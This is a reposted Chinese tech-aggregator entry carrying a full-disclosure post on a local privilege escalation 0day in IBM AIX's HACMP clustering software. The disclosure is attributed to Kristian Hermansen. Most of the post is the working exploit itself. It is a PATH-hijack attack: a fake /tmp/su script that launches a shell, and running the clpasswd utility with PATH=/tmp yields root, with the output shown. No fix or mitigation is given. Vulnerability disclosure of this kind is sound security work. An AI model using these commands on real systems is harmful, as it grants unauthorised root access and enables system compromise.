IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    IBM AIX High Availability Cluster Multiprocessing (HACMP) Local Privilege Escalation 0day

    没穿底裤发表于 2015-09-09 01:25:56
    love 0

    少见的AIX的权限提升

    IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
    
    Let's kill some more bugs today and force vendor improvement :)
    
    """
    $ cat /tmp/su
    #!/bin/sh
    /bin/sh
    $ chmod +x /tmp/su
    $ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
    # /usr/bin/whoami
    root
    """

    References:
    https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
    http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm

    —
    Kristian Erik Hermansen (@h3rm4ns3c)
    https://www.linkedin.com/in/kristianhermansen
    —



沪ICP备19023445号-2号
友情链接